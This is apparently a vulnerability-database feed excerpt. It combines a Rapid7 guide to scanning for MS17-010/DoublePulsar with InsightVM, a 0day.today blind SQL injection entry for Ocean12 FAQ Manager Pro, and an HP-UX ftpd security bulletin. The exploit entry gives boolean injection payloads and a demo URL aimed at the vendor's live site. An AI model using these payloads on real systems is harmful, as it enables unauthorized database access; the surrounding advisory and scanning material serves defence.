DoublePulsar is often delivered using the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue exploit package</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">—MS17-010—which is the same vulnerability that gave rise to the widespread WannaCry infections in May. To help customers, we are reiterating the steps we issued for WannaCry on creating a scan, dynamic asset group, and remediation project for identifying and fixing these vulnerabilities. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, you can <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. </span><span style=\"color: #1155cc; font-size: 11pt; font-family: Arial;\"><br/></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong>Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates > Manage Templates</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\"><img class=\"jive-image\" height=\"229\" src=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “Double Pulsar and WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\"><img class=\"jive-image\" height=\"247\" src=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\"><img class=\"jive-image\" height=\"275\" src=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\" 
style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\"><img class=\"jive-image\" height=\"265\" src=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check \"<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>\"</span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\"><img class=\"jive-image\" height=\"227\" src=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 195 checks that are related to 
MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\"><span 
style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0148</span></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Dynamic Asset Group for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> c</span><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">onsole, just under the search button:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\"><img class=\"jive-image\" height=\"157\" src=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">This asset group can now be used for 
reporting as well as tagging to quickly identify exposed systems.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a DoublePulsar/WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry and DoublePulsar, you could use this Dashboard filter:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #231f20;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" 
data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting. This will also apply to DoublePulsar</a>.</span></p><h2 dir=\"ltr\"></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Remediation Project for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\"><img class=\"jive-image\" height=\"144\" src=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds <=> ( altId = \"ms17-010\" )\"</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\"><img class=\"jive-image\" height=\"456\" src=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\" style=\"border-style: none;\" 
width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now you can give this project a description and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.atlassian.com%2Fsoftware%2Fjira\" rel=\"nofollow\" target=\"_blank\">JIRA</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the vulnerability that enables both WannaCry and DoublePulsar infections. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on DoublePulsar, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>. 
</span></p></div><!-- [DocumentBodyEnd:53f4c57c-eea0-4790-a908-f2f47ce880e1] -->", "modified": "2017-06-23T21:23:11", "published": "2017-06-23T21:23:11", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/23/protecting-against-doublepulsar-infection-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "title": "Protecting against DoublePulsar infection with InsightVM and Nexpose", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-19T15:14:07", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-28T00:00:00", "published": "2008-11-28T00:00:00", "id": "1337DAY-ID-4294", "href": "https://0day.today/exploit/description/4294", "type": "zdt", "title": "Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity", "sourceData": "===============================================================\r\nOcean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity\r\n===============================================================\r\n\r\n\r\n#########################################################\r\n---------------------------------------------------------\r\nPortal Name: Ocean12 FAQ Manager Pro\r\nAuthor : Mountassif Moad\r\nVulnerability : Blind Sql Injection\r\n---------------------------------------------------------\r\n#########################################################\r\nExploit :\r\nsite.com/?Action=Cat&ID=40%20and%201=1 true\r\nsite.com/?Action=Cat&ID=40%20and%201=0 false\r\nDemo :\r\nhttp://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true\r\nhttp://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false\r\n\r\n# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://0day.today/exploit/4294"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Invalid fragmented IP reassembly, some attacks against IIS may pass undetected.", "modified": "2007-07-12T00:00:00", "published": "2007-07-12T00:00:00", "id": "SECURITYVULNS:VULN:7919", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7919", "title": "3COM Tippingpoint multiple protection bypass ways", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\nHPSBUX01119 REVISION: 0\r\n\r\nSSRT4694 rev.0 - HP-UX ftpd remote unauthorized access\r\n\r\nNOTICE:\r\nThere are no restrictions for distribution of this Security\r\nBulletin provided that it remains complete and intact.\r\n\r\nThe information in this Security Bulletin should be acted upon\r\nas soon as possible.\r\n\r\nINITIAL RELEASE:\r\n23 February 2005\r\n\r\nPOTENTIAL SECURITY IMPACT:\r\nremote unauthorized access\r\n\r\nSOURCE:\r\nHewlett-Packard Company\r\nHP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY:\r\nA potential vulnerability has been identified with HP-UX running\r\nftpd where the vulnerability could be exploited to allow a remote\r\nauthorized user unauthorized access to files.\r\n\r\nREFERENCES:\r\nNone\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.00, B.11.04, B.11.11, B.11.22, and B.11.23.\r\n\r\nBACKGROUND:\r\n\r\nNote: In addition to the versions of ftp delivered with HP-UX\r\n WU-FTPD 2.6 is available from software.hp.com:\r\n\r\n Overview\r\n WU-FTPD is the FTP daemon for HP-UX systems.\r\n WU-FTPD 2.6.1 is the latest version of WU-FTPD\r\n available on both HP-UX 11.0 and 11i v1 platforms. 
The\r\n IPv6-enabled version of WU-FTPD is available only on\r\n the HP-UX 11i v1 platform.\r\n\r\n AFFECTED VERSIONS\r\n\r\n Note: To determine if a system has an affected version,\r\n search the output of "swlist -a revision -l fileset"\r\n for an affected fileset. Then determine if the\r\n recommended patch or update is installed.\r\n\r\n HP-UX B.11.23\r\n =============\r\n InternetSrvcs.INETSVCS2-RUN\r\n action: install PHNE_30983 or subsequent.\r\n\r\n HP-UX B.11.22\r\n =============\r\n InternetSrvcs.INETSVCS2-RUN\r\n action: install PHNE_29462 or subsequent.\r\n\r\n HP-UX B.11.11\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_30990 or subsequent.\r\n\r\n WUFTP-26.INETSVCS-FTP\r\n action: install revision B.11.11.01.004 or subsequent.\r\n\r\n HP-UX B.11.04\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_32813 or subsequent.\r\n\r\n HP-UX B.11.00\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_30989 or subsequent.\r\n\r\n WUFTP-26.INETSVCS-FTP\r\n action: install revision B.11.00.01.004 or subsequent.\r\n\r\n\r\n END AFFECTED VERSIONS\r\n\r\nRESOLUTION:\r\nHP has made the following available to resolve the issue:\r\n\r\nHP-UX B.11.11 WU-FTPD 2.6.1 B.11.11.01.004\r\nHP-UX B.11.00 WU-FTPD 2.6.1 B.11.00.01.004\r\n available from http://software.hp.com/\r\n\r\nHP-UX B.11.23 PHNE_30983\r\nHP-UX B.11.22 PHNE_29462\r\nHP-UX B.11.11 PHNE_30990\r\nHP-UX B.11.04 PHNE_32813\r\nHP-UX B.11.00 PHNE_30989\r\n available from http://itrc.hp.com/\r\n\r\nMANUAL ACTIONS: Yes - Update\r\nIf WU-FTPD 2.6 is installed, update to:\r\n\r\nHP-UX B.11.11 WU-FTPD 2.6.1 B.11.11.01.004\r\nHP-UX B.11.00 WU-FTPD 2.6.1 B.11.00.01.004\r\n available from http://software.hp.com/\r\n\r\nBULLETIN REVISION HISTORY:\r\nRevision 0: 23 February 2005\r\n Initial release.\r\n\r\n\r\n\r\nHP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision\r\nB.02.00 analyzes all HP-issued Security Bulletins to provide a\r\nsubset 
of recommended actions that potentially affect a specific\r\nHP-UX system.\r\n\r\nFor more information:\r\nhttp://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/\r\ndisplayProductInfo.pl?productNumber=B6834AA\r\n\r\n\r\nSUPPORT: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n'get key' (no quotes).\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\n\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&\r\nlangcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your IRTC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your IRTC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\n\r\nLog in on the web page\r\n Subscriber's choice for Business: sign-in.\r\nOn the Web page:\r\n Subscriber's Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number:\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 
3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing & Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user's use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement."\r\n\r\n\r\n(c)Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. 
Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQh3IcuAfOvwtKn1ZEQJn4QCgoQ9wFmICNRszKwdb/XByZmf8AIgAoKr3\r\n+gQwCVo5nf+DTBO7LaTf5vdr\r\n=cbzM\r\n-----END PGP SIGNATURE-----", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:DOC:7919", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7919", "title": "[Security Bulletin] SSRT4694 HP-UX ftpd remote unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Buffer overflow in debug mode, unauthorized files access.", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:VULN:4294", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4294", "title": "HP-UX ftpd FTP server multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}